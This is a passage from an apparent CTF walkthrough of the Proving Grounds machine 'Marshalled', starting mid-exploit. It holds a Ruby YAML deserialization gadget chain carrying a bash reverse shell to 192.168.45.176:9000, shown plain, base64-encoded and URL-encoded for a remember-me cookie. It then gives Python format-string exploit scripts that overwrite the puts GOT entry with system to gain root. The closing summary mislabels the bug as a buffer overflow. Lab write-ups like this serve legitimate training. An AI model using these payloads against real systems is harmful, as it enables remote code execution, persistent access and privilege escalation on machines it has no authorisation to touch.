 - !ruby/object:Gem::Requirement
   requirements:
     !ruby/object:Gem::Package::TarReader
     io: &1 !ruby/object:Net::BufferedIO
       io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
       debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: bash -c "bash -i >& /dev/tcp/192.168.45.176/9000 0>&1"
          method_id: :resolve

  • We will now encode the yaml file in base64.

cat payload.yml | base64 | tr -d '\t\n\r\'

LS0tCiAtICFydWJ5L29iamVjdDpHZW06Okluc3RhbGxlcgogICAgIGk6IHgKIC0gIXJ1Ynkvb2JqZWN0OkdlbTo6U3BlY0ZldGNoZXIKICAgICBpOiB5CiAtICFydWJ5L29iamVjdDpHZW06OlJlcXVpcmVtZW50CiAgIHJlcXVpcmVtZW50czoKICAgICAhcnVieS9vYmplY3Q6R2VtOjpQYWNrYWdlOjpUYXJSZWFkZXIKICAgICBpbzogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6QnVmZmVyZWRJTwogICAgICAgaW86ICYxICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcjo6RW50cnkKICAgICAgICAgIHJlYWQ6IDAKICAgICAgICAgIGhlYWRlcjogImFiYyIKICAgICAgIGRlYnVnX291dHB1dDogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgICBzb2NrZXQ6ICYxICFydWJ5L29iamVjdDpHZW06OlJlcXVlc3RTZXQKICAgICAgICAgICAgICBzZXRzOiAhcnVieS9vYmplY3Q6TmV0OjpXcml0ZUFkYXB0ZXIKICAgICAgICAgICAgICAgICAgc29ja2V0OiAhcnVieS9tb2R1bGUgJ0tlcm5lbCcKICAgICAgICAgICAgICAgICAgbWV0aG9kX2lkOiA6c3lzdGVtCiAgICAgICAgICAgICAgZ2l0X3NldDogYmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3Ni85MDAwIDA+JjEiCiAgICAgICAgICBtZXRob2RfaWQ6IDpyZXNvbHZlCg==

  • Next, we must URL encode it in order to transport it in request without any issue.

LS0tCiAtICFydWJ5L29iamVjdDpHZW06Okluc3RhbGxlcgogICAgIGk6IHgKIC0gIXJ1Ynkvb2JqZWN0OkdlbTo6U3BlY0ZldGNoZXIKICAgICBpOiB5CiAtICFydWJ5L29iamVjdDpHZW06OlJlcXVpcmVtZW50CiAgIHJlcXVpcmVtZW50czoKICAgICAhcnVieS9vYmplY3Q6R2VtOjpQYWNrYWdlOjpUYXJSZWFkZXIKICAgICBpbzogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6QnVmZmVyZWRJTwogICAgICAgaW86ICYxICFydWJ5L29iamVjdDpHZW06OlBhY2thZ2U6OlRhclJlYWRlcjo6RW50cnkKICAgICAgICAgIHJlYWQ6IDAKICAgICAgICAgIGhlYWRlcjogImFiYyIKICAgICAgIGRlYnVnX291dHB1dDogJjEgIXJ1Ynkvb2JqZWN0Ok5ldDo6V3JpdGVBZGFwdGVyCiAgICAgICAgICBzb2NrZXQ6ICYxICFydWJ5L29iamVjdDpHZW06OlJlcXVlc3RTZXQKICAgICAgICAgICAgICBzZXRzOiAhcnVieS9vYmplY3Q6TmV0OjpXcml0ZUFkYXB0ZXIKICAgICAgICAgICAgICAgICAgc29ja2V0OiAhcnVieS9tb2R1bGUgJ0tlcm5lbCcKICAgICAgICAgICAgICAgICAgbWV0aG9kX2lkOiA6c3lzdGVtCiAgICAgICAgICAgICAgZ2l0X3NldDogYmFzaCAtYyAiYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3Ni85MDAwIDA%2BJjEiCiAgICAgICAgICBtZXRob2RfaWQ6IDpyZXNvbHZlCg%3D%3D

  • Capture a new request to dashboard in Burpsuite, add our generated token in the remember me parameter. Once executed, it will grant us a reverse shell on our netcat listener at port 9000.

creating new request with payload

got initial access

  • Captured the local flag as well.

local flag

Privilege Escalation:

  • Next, enumerated the target for the SUID binaries in the filesystem reveals an interesting binary named cname.

find / -type f -perm -4000 2>/dev/null

looking for SUID binaries

  • We transfer the binary to our attack machine for further analysis. – /usr/bin/cname

  • We transfer the binary to our attack machine for further analysis.

$ file cname
cname: ELF 32-bit LSB executable
 Intel 80386
 version 1 (SYSV)
 dynamically linked
 interpreter /lib/ld-linux.so.2
 BuildID[sha1]=139a42fb679798eb9c9efffaeafbfbb39c60e48b
 for GNU/Linux 3.2.0
 with debug_info
 not stripped

 $ checksec cname
<snip>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

  • We notice the file is a 32-bit binary with PIE disabled. Using gdb we notice debugging information.

Viewing the complete source code:

#include "stdio.h"
#include "stdlib.h"
#include "string.h"

char *concat(const char *a, const char *b)
{
    size_t len_a = strlen(a);
    size_t len_b = strlen(b);
    size_t size = len_a + len_b;

    char *s = malloc(size + 1);
    int i;

    for (i = 0; i < len_a; ++i)
        s[i] = a[i];
    for (i = 0; i < len_b; ++i)
        s[len_a + i] = b[i];
    s[size] = 0;
    return s;
}

void log(char *s)
{
    setuid(0);

    char *log_msg = concat("[+] ", s);
    int size = strlen(log_msg) + 2;
    char *buf = malloc(size);
    snprintf(buf, size, "%s\n", log_msg);
    printf(buf);
}

void add(char *entry)
{

    FILE *fd;
    char buffer[256];

    fd = fopen("/etc/hosts", "a");
    if (fd == NULL)
    {
        perror("Error opening file.");
    }
    else
    {
        char *msg = concat("Adding: ", entry);
        log(msg);

        fputs(entry, fd);
        fputs("\n", fd);
        fclose(fd);
    }
}

int main(int argc, char const *argv[])
{

    if (argc < 3)
    {
        printf("error: usage: %s <ip> <cname>\n", argv[0]);
        return 0;
    }

    int size = strlen(argv[1]) + strlen(argv[2]) + 2;

    char buf[size];

    sprintf(buf, "%s %s", argv[1], argv[2]);

    add(buf);

    puts("1 Entry added.");
}

  • We notice a format string vulnerability in the log function:

void log(char *s)
{
    char *log_msg = concat("[+] ", s);
    int size = strlen(log_msg) + 2;
    char *buf = malloc(size);
    snprintf(buf, size, "%s\n", log_msg);
    printf(buf);
}

  • The value of s gets copied into log_msg, which then goes into printf.

  • In order to exploit this, we will use the format string vulnerability to overwrite the GOT entry for puts with the address of the system() function.

  • The final puts() call prints a static value “1 Entry added”, thus we will set the path to a folder containing a binary specified by us with the name 1, which the underlying shell will then execute.

  • We know that the binary does not have PIE enabled, which means that we won’t have to worry about the addresses changing each time the binary reloads.

  • We will attempt to build an exploit locally starting by disabling this ASLR locally:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

  • Now we use the following template for the format strings attack:

#! /usr/bin/env python2
import sys
import struct

def p32(addr):
   return struct.pack('I', addr)

address = 0xdeadbeef

size = 500

addr = "AAAA" +  p32(address+0) + "BBBB" +  p32(address+1) + "CCCC" +  p32(address+2) + "DDDD" +  p32(address+3)

stack_pop_sequence = '%x.'*130

# TODO: replace |%x| with |%n|
write = "%000x|%x|%000x|%x|%000x|%x|%000x|%x|"

padding = size - len(addr + stack_pop_sequence + write)

print (addr + stack_pop_sequence + write + padding * "A")

  • Next, we will try to find the offset of the printf stack pointer.

  • We increase the length of the stack pop sequence until we find the value AAAA on the stack.

  • The output for 130:

./cname BBB $(python2 test.py)
[+] Adding: BBB AAAAᆳBBBBCCCCDDDD206.804a00d.804d4f0.8.804d4f0.206.804d700.804a013.804c000.ffffc448.80494d0.804d2e0.ffffc460.ffffc460.804944e.ffffc35c.804a05b.ffffc458.ffffc460.ffffc35c.804d1a0.804d2e0.ffffc460.0.1.804a05b.ffffc458.f7ffd000.7.1.fbad8001.ffffc460.ffffc460.ffffc460.ffffc460.ffffc658.ffffffff.ffffc460.ffffffff.0.0.0.0.0.ffffffff.0.f7db4c9c.f7000000.0.0.f7fde278.f7ffd590.ffffffff.0.0.4.ffffffff.0.8048362.804c038.f7fe184e.8048362.f7ffd990.ffffc414.f7ffdb50.f7fc9410.1.f7f999c0.0.f7fd1390.27992c00.f7ffd000.8048348.f7e1e7dd.804c000.3.ffffc660.ffffc698.f7e00330.ffffc460.ffffffff.804a05b.ffffc458.0.f7fe7ae4.ffffc972.27992c00.804a05b.804c000.ffffc698.804965b.ffffc460.804a05b.ffffc96e.ffffc972.20424242.41414141.deadbeef.42424242.deadbef0.43434343.deadbef1.44444444.deadbef2.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e|252e7825|78252e78|2e78252e|252e7825|78252e78|2e78252e|252e7825|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
1 Entry added.

  • We will decrease this value until we get |deadbeef|, and retrieve 96 as the offset:

./cname BBB $(python2 test.py)
[+] Adding: BBB AAAAᆳBBBBCCCCDDDD206.804a00d.804d4f0.8.804d4f0.206.804d700.804a013.804c000.ffffc448.80494d0.804d2e0.ffffc460.ffffc460.804944e.ffffc35c.804a05b.ffffc458.ffffc460.ffffc35c.804d1a0.804d2e0.ffffc460.0.1.804a05b.ffffc458.f7ffd000.7.1.fbad8001.ffffc460.ffffc460.ffffc460.ffffc460.ffffc658.ffffffff.ffffc460.ffffffff.0.0.0.0.0.ffffffff.0.f7db4c9c.f7000000.0.0.f7fde278.f7ffd590.ffffffff.0.0.4.ffffffff.0.8048362.804c038.f7fe184e.8048362.f7ffd990.ffffc414.f7ffdb50.f7fc9410.1.f7f999c0.0.f7fd1390.b146af00.f7ffd000.8048348.f7e1e7dd.804c000.3.ffffc660.ffffc698.f7e00330.ffffc460.ffffffff.804a05b.ffffc458.0.f7fe7ae4.ffffc972.b146af00.804a05b.804c000.ffffc698.804965b.ffffc460.804a05b.ffffc96e.ffffc972.20424242.41414141|deadbeef|42424242|deadbef0|43434343|deadbef1|44444444|deadbef2|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  • From here, the goal should be clear; we will move the internal stack pointer of printf to an address in the stack containing the address we want to write to.

  • In this case we want to overwrite the GOT entry of puts, which we find using objdump.

$ objdump -TR cname |grep puts
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   fputs
0804c020 R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c03c R_386_JUMP_SLOT   fputs@GLIBC_2.0

  • The address we want is: 0x0804c020.

  • Now we retrieve the address of system (note: we have a dynamically linked binary so we set a breakpoint on main and run it next):

gdb-peda$ r
<snip>
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7df1780 <system>

  • We will update our exploit script:

#! /usr/bin/env python2
import sys
import struct

def p32(addr):
   return struct.pack('I', addr)

address = 0x0804c020 # puts@got

value = 0xf7df1780 # system

size = 500

addr = "AAAA" +  p32(address+0) + "BBBB" +  p32(address+1) + "CCCC" +  p32(address+2) + "DDDD" +  p32(address+3)

stack_pop_sequence = '%x.'*96

# TODO: replace |%x| with |%n|
write = "%000x|%x|%000x|%x|%000x|%x|%000x|%x|"

padding = size - len(addr + stack_pop_sequence + write)

suffix = "AAA"

print (addr + stack_pop_sequence + write + padding * "A"+ suffix)

  • We next check whether we can override the address, and replace the first %x with %n:

write = "%000x|%n|%000x|%x|%000x|%x|%000x|%x|"

  • We have to be careful in this case, as the address we want to write to contains 0x20 which is interpreted by our shell as whitespace.

  • To avoid any errors we call the binary using quotes:

$ ./cname BBB "$(python2 test.py)"

  • We notice that the binary now segfaults. Opening in gdb, we confirm we took control of the instruction pointer!

opening in gdb

  • We see that %n writes the amount of bytes printed so far, so we just have to do some math to find our target value 0xf7df1780 (little endian).

  • From the image above, we notice the LSB is 0xe5, and we want it to be 0x80, so there is an overflow involved.

  • We start by adding 150 to it:

write = "%150|%n|%000x|%x|%000x|%x|%000x|%x|"

Invalid address

  • Now we add 0x80 – 0x73 = 13:

write = "%163|%n|%000x|%x|%000x|%x|%000x|%x|"

Invalid address

  • From the output we have the correct byte.

  • We next apply the same procedure to the second byte, which will result in the following:

write = "%163x|%n|%149x|%n|%198x|%n|%022x|%n|"

  • and we will get the following familiar error:

got an error

  • We will create a binary with the name 1 next:

$ cat 1
sh
$ export PATH=$(pwd):$PATH

  • and we get a rootshell back:

got root shell

  • All thats left is to adjust the exploit to the remote environment using the same method:

#! /usr/bin/env python2
import sys
import struct

def p32(addr):
   return struct.pack('I', addr)

address = 0x0804c020 # puts@got

value = 0xf7dcdcb0 # system

size = 500

addr = "AAAA" +  p32(address+0) + "BBBB" +  p32(address+1) + "CCCC" +  p32(address+2) + "DDDD" +  p32(address+3)

stack_pop_sequence = '%x.'*96

# TODO: replace |%x| with |%n|
write = "%199x|%n|%042x|%n|%254x|%n|%025x|%n|"

padding = size - len(addr + stack_pop_sequence + write)

suffix = "AAA"

print (addr + stack_pop_sequence + write + padding * "A"+ suffix)

  • We run the script and have successfully obtained root access.

proof flag

Also Read: PG – Kevin

Conclusion:

Conclusion

So that was “Marshalled” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Performed subdomain enumeration via wfuzz and found monitoring.marshalled.pg. Found a login panel on subdomain with remember me option which holds an interesting cookie. Decoded the remember token value and found the running YAML version which is eventually vulnerable to Blind RCE through YAML Deserialization in Ruby on Rails framework. Used a POC to get initial access on the target. Next, enumerated the target for the SUID binaries in the filesystem reveals an interesting binary named cname. For privilege escalation, exploited a buffer overflow in cname binary to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top